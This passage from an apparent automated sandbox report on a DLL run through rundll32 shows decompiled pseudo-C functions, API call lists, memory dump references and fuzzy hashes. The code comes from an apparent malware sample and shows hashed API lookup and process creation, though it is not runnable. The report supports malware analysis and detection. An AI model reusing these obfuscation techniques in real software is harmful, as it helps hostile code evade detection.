				E0000000118000459C(0x5431d47a, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t88 == _t133) goto 0x80005e56;
				 *_t88();
				goto 0x80005e59;
				if (r13d == r13d) goto 0x80005fb4;
				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t88 == _t133) goto 0x80005e9d;
				_t10 = _t122 + 0x68; // 0xa
				r8d = 0;
				 *((long long*)(_t122 + 0x28)) = _t10;
				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
				 *_t88();
				goto 0x80005ea0;
				if (r13d == r13d) goto 0x80005fb4;
				 *(_t122 + 0x68) = r13d;
				 *(_t122 + 0x60) = r13d;
				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t88 == _t133) goto 0x80005eea;
				_t19 = _t122 + 0x68; // 0xa
				r9d = 0;
				r8d = 0;
				 *((long long*)(_t122 + 0x28)) = _t19;
				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
				 *_t88();
				r8d =  *(_t122 + 0x60);
				HeapAlloc(_t133, _t130, _t111);
				if (_t88 == _t133) goto 0x80005fad;
				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t88 == _t133) goto 0x80005f43;
				_t27 = _t122 + 0x68; // 0xa
				r8d = 0;
				 *((long long*)(_t122 + 0x28)) = _t27;
				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
				 *_t88();
				goto 0x80005f46;
				if (r13d == r13d) goto 0x80005f95;
				 *(_t122 + 0x60) =  *(_t122 + 0x60) >> 1;
				 *((intOrPtr*)(_t88 + _t88 * 2)) = r13w;
				r8d =  *(_t122 + 0x60);
				HeapAlloc(_t114, _t117);
				if (_t88 == _t133) goto 0x80005f8e;
				r8d =  *(_t122 + 0x60);
				r8d = r8d + 1;
				wcstombs(??, ??, ??);
				 *(__rcx + 0x20) = _t88;
				goto 0x80005f9d;
				goto 0x80005f9d;
				GetLastError();
				HeapFree(??, ??, ??);
				goto 0x80005fbc;
				goto 0x80005fbc;
				return GetLastError();
			}

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

HeapAlloc.KERNEL32 ref: 0000000180005EF8
HeapAlloc.KERNEL32 ref: 0000000180005F67
wcstombs.NTDLL ref: 0000000180005F83
HeapFree.KERNEL32 ref: 0000000180005FA5

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Alloc$ErrorFreeLastwcstombs
String ID:
API String ID: 4133724704-0
Opcode ID: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
Instruction ID: a4f29d9b70dc603b3f8cc85abbd9ea91cf1cef2a8837b32e5229c32126143bc8
Opcode Fuzzy Hash: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
Instruction Fuzzy Hash: 3F515A36204A8887E7A1DB52E4403AF7761F78C7C9F548521BA8D87B54DF38D65D8B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003FCC Relevance: 9.1, APIs: 6, Instructions: 125
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E00000001180003FCC(intOrPtr* __rcx) {
				void* __rbx;
				void* __rbp;
				long long* _t84;
				long long* _t85;
				void* _t87;
				intOrPtr* _t106;
				void* _t109;

				_t84 =  *0x8000d4a0;
				_t106 = __rcx;
				 *(_t109 + 0x58) =  *(_t109 + 0x58) & 0;
				E0000000118000459C(0x3a7e805d, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t84 == 0) goto 0x8000400e;
				 *_t84();
				goto 0x80004010;
				if (0 == 0) goto 0x80004151;
				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x8000414c;
				 *0x8000d028();
				if (0 != 0) goto 0x80004145;
				r8d = 0x1000;
				HeapAlloc(??, ??, ??);
				if (_t84 == 0) goto 0x80004133;
				E0000000118000459C(0x3cd8e449, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t84 == 0) goto 0x8000408d;
				r8d = 0x1000;
				r8d =  <  ?  *((void*)(_t109 + 0x50)) : r8d;
				 *_t84();
				goto 0x8000408f;
				if (0 == 0) goto 0x800040b7;
				r8d =  *(_t109 + 0x58);
				r9d = 0;
				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60))));
				 *((intOrPtr*)(_t85 + 0x20))();
				r11d =  *(_t109 + 0x58);
				 *((intOrPtr*)(_t109 + 0x50)) =  *((intOrPtr*)(_t109 + 0x50)) - r11d;
				if (0 == 0) goto 0x800040bf;
				goto 0x80004059;
				GetLastError();
				if (WaitForSingleObject(??, ??) == 0) goto 0x8000410b;
				E0000000118000459C(0x3a7e805d, _t85,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t85 == 0) goto 0x800040ef;
				 *_t85();
				goto 0x800040f1;
				if (0 == 0) goto 0x80004101;
				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x80004110;
				goto 0x80004059;
				GetLastError();
				goto 0x80004110;
				HeapFree(??, ??, ??);
				if (0x102 != 0) goto 0x80004138;
				E000000011800085E4(_t87, __rcx,  *((intOrPtr*)(_t109 + 0x60)));
				goto 0x80004138;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60)))) + 0x10))();
				goto 0x80004166;
				goto 0x80004166;
				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000008;
				goto 0x80004166;
				if (GetLastError() != 0x2efe) goto 0x80004166;
				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000000;
				return 0;
			}

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

HeapAlloc.KERNEL32 ref: 0000000180004047
GetLastError.KERNEL32 ref: 00000001800040B7
WaitForSingleObject.KERNEL32 ref: 00000001800040C5
GetLastError.KERNEL32 ref: 0000000180004101
HeapFree.KERNEL32 ref: 0000000180004118

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorLast$Heap$AllocFreeObjectSingleWait
String ID:
API String ID: 2540544816-0
Opcode ID: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
Instruction ID: f07a79ff2e09cda6f9955aa739d580884efaaa7540e40516afedcf37a36379f0
Opcode Fuzzy Hash: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
Instruction Fuzzy Hash: B54143B330464986EB92DB66D8403EA73A1F78CBD1F048425BE498BB95DF78C68DC714

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800091F8 Relevance: 9.1, APIs: 6, Instructions: 80
timeCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E000000011800091F8(void* __ecx, long long __rbx, signed long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r9, signed long long* _a8, void* _a16, void* _a24) {
				void* _t46;
				long _t52;
				void* _t54;
				signed long long _t67;
				long long _t69;
				signed long long* _t73;
				signed long long _t80;
				signed long long _t87;
				intOrPtr _t90;
				struct _FILETIME* _t91;
				void* _t98;
				void* _t103;
				signed long long _t104;
				signed long long* _t105;

				_t103 = _t98;
				 *((long long*)(_t103 + 0x10)) = __rbx;
				 *((long long*)(_t103 + 0x18)) = __rsi;
				 *(_t103 + 8) =  *(_t103 + 8) & 0x00000000;
				 *((long long*)(_t103 - 0x18)) = _t103 + 8;
				_t46 =  *((intOrPtr*)(__rcx + 0xa0))();
				_t73 = _a8;
				if (_t73 == 0) goto 0x8000925e;
				_t87 = _t73 + 0x18;
				 *(_t73 + 0x20) = _t87;
				_a8[3] = _t87;
				_a8[2] = __rcx;
				_a8[1] = __rdx;
				 *_a8 =  *_a8 | 0xffffffff;
				if (_t46 != 0) goto 0x80009327;
				GetSystemTimeAsFileTime(_t91);
				EnterCriticalSection(??);
				_t104 = __rcx + 0x88;
				_t80 =  *(_t104 + 8);
				_a8[3] = _t104;
				_a8[4] = _t80;
				 *_t80 =  &(_a8[3]);
				_t67 =  &(_a8[3]);
				 *(_t104 + 8) = _t67;
				LeaveCriticalSection(??);
				asm("lock add dword [edi+0x40], 0x1");
				E00000001180006C8C(__ecx, _t67, __rbx, 0x180004c4c, _a8, __rdx, __rbp,  &(_a8[7]));
				_a8[6] = _t67;
				if (_a8[6] != 0) goto 0x80009331;
				_t52 = GetLastError();
				EnterCriticalSection(??);
				_t105 = _a8;
				_t69 =  *((intOrPtr*)(_t105 + 0x20));
				_t90 =  *((intOrPtr*)(_t105 + 0x18));
				 *_t69 = _t90;
				 *((long long*)(_t90 + 8)) = _t69;
				LeaveCriticalSection(??);
				asm("lock add dword [edi+0x40], 0xffffffff");
				if (_t52 == 0) goto 0x80009331;
				if (_a8 == 0) goto 0x80009331;
				E00000001180002770(_t54, _a8);
				return _t52;
			}

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000926A
EnterCriticalSection.KERNEL32 ref: 0000000180009274
LeaveCriticalSection.KERNEL32 ref: 00000001800092B4
GetLastError.KERNEL32 ref: 00000001800092E9
EnterCriticalSection.KERNEL32 ref: 00000001800092F5
LeaveCriticalSection.KERNEL32 ref: 0000000180009313

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTime$ErrorFileLastSystem
String ID:
API String ID: 3478816279-0
Opcode ID: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
Instruction ID: bca48ed322468cd715f0c7fdd995b284444db085db22600a9e38dd0ce7ab83a9
Opcode Fuzzy Hash: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
Instruction Fuzzy Hash: 18415676204F4992DB44CF55E48439D73B4F789B94F608221EBAD837A4DF3ACA6AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005A0C Relevance: 9.1, APIs: 6, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A5E
HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A72
WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AA0
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AB4
HeapFree.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AC4
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AD3

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharErrorHeapLastMultiWide$AllocFree
String ID:
API String ID: 2267670476-0
Opcode ID: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
Instruction ID: 6c13c8b96c3627637da9d419a19c7af847a2c5e8b3803c2844c54b1b1a61164e
Opcode Fuzzy Hash: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
Instruction Fuzzy Hash: 1B21A132304B4886E391DF63B88879A76A5F74CBD0F69C139EE9A93750DF34C9498701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009B7C Relevance: 9.1, APIs: 6, Instructions: 60
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00000001180009B7C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _v40;
				long long _v56;
				void* _t32;
				intOrPtr _t33;
				void* _t55;
				WCHAR* _t63;
				WCHAR* _t66;
				CHAR* _t69;

				_t32 = _t55;
				 *((long long*)(_t32 + 8)) = __rbx;
				 *((long long*)(_t32 + 0x10)) = __rbp;
				 *((long long*)(_t32 + 0x18)) = __rsi;
				 *((long long*)(_t32 + 0x20)) = __rdi;
				_t33 =  *0x8000d4a0;
				lstrlenA(_t69);
				lstrlenW(_t66);
				lstrlenW(_t63);
				r8d = __rbx + _t33 + 0x12;
				HeapAlloc(??, ??, ??);
				if (_t33 == 0) goto 0x80009c2e;
				_v56 = __r8;
				__imp__wnsprintfW();
				r9d = 0;
				r8d = 0;
				E00000001180006754(__rbx, __rcx, _t33, __r8, __rdx,  *0x8000d490 + 0x80011438);
				HeapFree(??, ??, ??);
				goto 0x80009c32;
				return _v40;
			}

APIs

lstrlenA.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BB6
lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BBF
lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BCA
HeapAlloc.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BDF
wnsprintfW.SHLWAPI ref: 0000000180009C05

Part of subcall function 0000000180006754: memset.NTDLL ref: 0000000180006786
Part of subcall function 0000000180006754: CreateProcessW.KERNEL32 ref: 00000001800067F7
Part of subcall function 0000000180006754: WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
Part of subcall function 0000000180006754: TerminateProcess.KERNEL32 ref: 0000000180006844
Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000684F
Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000685A
Part of subcall function 0000000180006754: HeapFree.KERNEL32 ref: 0000000180006877

HeapFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009C26

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heaplstrlen$CloseFreeHandleProcess$AllocCreateMultipleObjectsTerminateWaitmemsetwnsprintf
String ID:
API String ID: 3150570956-0
Opcode ID: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
Instruction ID: c1893427c912dd33d9beb41109e2d516a90994c651c2d5da5d8851701b433d67
Opcode Fuzzy Hash: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
Instruction Fuzzy Hash: DD217F35710B48C6EB45CF66A85479A77A0F78CFC4F848126EE5A43B64DF38D60ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004DD0 Relevance: 8.8, APIs: 7, Instructions: 80
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00000001180004DD0(long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long* __r8) {
				void* _t13;
				intOrPtr* _t39;
				intOrPtr _t41;
				CHAR* _t54;
				long long _t60;
				long long _t61;
				void* _t63;
				long _t69;
				long _t73;
				long long _t74;
				void* _t76;
				CHAR* _t79;

				 *((long long*)(_t63 + 8)) = __rbx;
				 *((long long*)(_t63 + 0x10)) = _t60;
				 *((long long*)(_t63 + 0x18)) = __rsi;
				_t39 =  *0x8000d4a0;
				_t41 =  *((intOrPtr*)(_t39 + 8));
				_t13 = lstrlenA(_t79) + 1;
				r8d = _t13;
				HeapAlloc(_t76, _t73, _t69);
				_t74 = _t39;
				if (_t39 == __rsi) goto 0x80004eb7;
				HeapAlloc(??, ??, ??);
				_t61 = _t39;
				if (_t39 == __rsi) goto 0x80004ea9;
				E00000001180004994(_t39, _t41, __rcx);
				if (_t39 == __rsi) goto 0x80004e62;
				if ( *_t39 !=  *((intOrPtr*)(_t39 + 1))) goto 0x80004e62;
				_t6 = _t39 + 2; // 0x2
				E00000001180004994(_t39, _t41, _t6);
				if (_t39 == __rsi) goto 0x80004e8e;
				r8d = _t13 - r12d;
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t41 + _t74)) = sil;
				lstrcpyA(_t54);
				goto 0x80004e9c;
				lstrcpyA(??, ??);
				 *_t61 = 0x2f;
				 *((intOrPtr*)(_t61 + 1)) = sil;
				 *__rdx = _t74;
				 *__r8 = _t61;
				goto 0x80004eb7;
				HeapFree(??, ??, ??);
				return 1;
			}

APIs

lstrlenA.KERNEL32 ref: 0000000180004E02
HeapAlloc.KERNEL32 ref: 0000000180004E14
HeapAlloc.KERNEL32 ref: 0000000180004E2E
HeapFree.KERNEL32 ref: 0000000180004EB1

Part of subcall function 0000000180004994: strchr.NTDLL ref: 00000001800049B6

memcpy.NTDLL ref: 0000000180004E77
lstrcpyA.KERNEL32 ref: 0000000180004E86
lstrcpyA.KERNEL32 ref: 0000000180004E8E

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Alloclstrcpy$Freelstrlenmemcpystrchr
String ID:
API String ID: 2951650171-0
Opcode ID: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
Instruction ID: 05cbd2bd38c1d1587f62c6617ae6625bb3c46c91ac70328d53f87b1fbcc7e3b3
Opcode Fuzzy Hash: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
Instruction Fuzzy Hash: 9C21BF723047D886E782EF66B80839ABA91B38CFD4F49C420FE498B755DE38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800099F4 Relevance: 7.6, APIs: 6, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E000000011800099F4(void* __ecx, long long __rbx, void* __rcx, long long __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, void* __r10, void* __r11, char _a8, long long _a16, long long _a24) {
				void* _v48;
				char _v56;
				char _v64;
				char _v72;
				intOrPtr _v80;
				long long _v88;
				void* __rdi;
				void* _t73;
				long long _t75;
				void* _t91;
				intOrPtr _t106;
				intOrPtr* _t115;

				_t92 = __rsi;
				_a24 = __rbx;
				_a16 = __rdx;
				_t106 =  *((intOrPtr*)(__rcx + 0x40));
				_t75 = __rdx;
				r10d =  *(_t106 + 2) & 0x0000ffff;
				_t115 = __r8;
				if ( *0x8000d4a0 - __r10 + 8 <= 0) goto 0x80009a51;
				_t73 = __r10 + _t106 + 8;
				if (( *0x8000d498 ^ 0xecb028fc) == 0) goto 0x80009a53;
				E00000001180004ED8( *0x8000d498 ^ 0xecb028fc, _t73);
				goto 0x80009a53;
				if (_t73 == 0) goto 0x80009b5c;
				_t9 =  &_a8; // 0x52
				_t10 =  &_v56; // 0x12
				if (E000000011800094E0(__rdx, _t73, _t91, __rsi, __rbp, _t10, _t9) != 0) goto 0x80009b61;
				_t11 = _t73 + 2; // 0x2
				if (_a8 - _t11 <= 0) goto 0x80009aa8;
				_t15 =  &_v64; // 0xa
				_t16 =  &_v48; // 0x1a
				E000000011800081F0(_a8, _t75, _v56, _t92, _t16, _t15, __r11);
				goto 0x80009aad;
				if (0x57 != 0) goto 0x80009b36;
				r13d = _v64;
				_t19 =  &_v72; // 0x2
				_t20 =  &_v64; // 0xa
				_v80 = r13d;
				_v72 =  *_t115;
				_v88 = _v48;
				if (E00000001180006EB0( *_t115, _t75, _t75, _t20, _t19) != 0) goto 0x80009b16;
				memcpy(??, ??, ??);
				 *_t115 = _v72;
				HeapFree(??, ??, ??);
				goto 0x80009b1b;
				memset(??, ??, ??);
				HeapFree(??, ??, ??);
				r8d = _a8;
				memset(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x80009b61;
				return 2;
			}

APIs

memcpy.NTDLL(?,0000000180005069), ref: 0000000180009AFC
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009B0E
memset.NTDLL(?,0000000180005069), ref: 0000000180009B23
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009B30
memset.NTDLL(?,0000000180005069), ref: 0000000180009B45
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009B54

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: FreeHeap$memset$memcpy
String ID:
API String ID: 4172471534-0
Opcode ID: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
Instruction ID: 54b9a56baf89d223affce05d04c9eed0c8a26e8b2822132c81dbcb815bbc5161
Opcode Fuzzy Hash: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
Instruction Fuzzy Hash: A9418E32204A8982EA92DB56E4007DBB7A1F7CDBD4F55C012FE8947759EF38C64ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008034 Relevance: 7.6, APIs: 6, Instructions: 78
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00000001180008034(void* __ebx, signed int __edx, void* __ebp, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long __r8, intOrPtr* __r9, void* _a8, void* _a16, long long* _a24, void* _a32) {
				void* _t44;
				void* _t52;
				long long _t53;
				signed long long _t54;
				intOrPtr _t67;
				long _t68;
				long long _t70;
				void* _t77;
				intOrPtr* _t83;
				long _t87;
				void* _t88;
				void* _t90;
				struct _CRITICAL_SECTION* _t92;
				struct _CRITICAL_SECTION* _t96;

				_t52 = _t77;
				 *((long long*)(_t52 + 8)) = __rbx;
				 *((long long*)(_t52 + 0x10)) = __rbp;
				 *((long long*)(_t52 + 0x20)) = __rsi;
				 *((long long*)(_t52 + 0x18)) = __r8;
				_t53 =  *0x8000d4a0;
				_t88 = __rcx;
				EnterCriticalSection(_t96);
				LeaveCriticalSection(_t92);
				HeapAlloc(_t90, _t87, _t68);
				_t70 = _t53;
				if (_t53 == __edx) goto 0x80008129;
				memset(??, ??, ??);
				EnterCriticalSection(??);
				r11d =  *((intOrPtr*)(__rcx + 0xa8));
				_t44 =  >=  ? r11d :  *((intOrPtr*)(__rcx + 0xa8));
				if (_t44 == 0) goto 0x80008111;
				_t54 = __edx + __edx * 4;
				_t14 = _t88 + 0x98; // 0x98
				_t16 = _t54 * 8; // 0xc
				_t83 = _t70 + _t16 + 0xc;
				_t67 =  *_t14;
				 *((intOrPtr*)(_t83 - 0xc)) =  *((intOrPtr*)(_t67 + 0x1c));
				 *((long long*)(_t83 + 0x14)) =  *((intOrPtr*)(_t67 + 0x10));
				 *_t83 =  *((intOrPtr*)(_t67 + 0x18));
				 *((intOrPtr*)(_t83 + 0x28 - 0x1c)) =  *((intOrPtr*)(_t67 + 0x18));
				if (_t44 + 0xffffffff != 0) goto 0x800080e7;
				LeaveCriticalSection(??);
				 *__r9 = __ebp + 1;
				 *_a24 = _t70;
				goto 0x8000812e;
				return 8;
			}

APIs

EnterCriticalSection.KERNEL32 ref: 000000018000806F
LeaveCriticalSection.KERNEL32 ref: 0000000180008082
HeapAlloc.KERNEL32 ref: 000000018000809A
memset.NTDLL ref: 00000001800080B2
EnterCriticalSection.KERNEL32 ref: 00000001800080BC
LeaveCriticalSection.KERNEL32 ref: 0000000180008116

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocHeapmemset
String ID:
API String ID: 3215818008-0
Opcode ID: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
Instruction ID: 1a3dd1e818266afc597f0a591a41220640f3dae03b5c6049ded73bf0a5c13329
Opcode Fuzzy Hash: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
Instruction Fuzzy Hash: F731A9B2A00B4896DB81CF5AE84878D77A0F748BD4F858026EF4D93360DF34CA9AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002668 Relevance: 7.6, APIs: 6, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,?,00000001,00000001800058DA,?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000269E
HeapAlloc.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026B0
lstrcpyA.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026DB
CloseHandle.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002724
GetLastError.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000272C
HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002741

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$AllocCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2779700050-0
Opcode ID: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
Instruction ID: 8ed8152a395896e124fdee7dd42a1db6533dceb9cab86c829ebc78b2e775e80d
Opcode Fuzzy Hash: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
Instruction Fuzzy Hash: 8221AD36604788C6E7A6DF52B84039AB7A0B78CBE0F48C425FE9A47764CF38D649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003698 Relevance: 7.6, APIs: 5, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00000001180003698(void* __eflags, long long __rbx, void* __rcx, long long __rdx, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, short _a32) {
				void* _v32;
				short _v38;
				short _v40;
				long long _v48;
				signed short _v54;
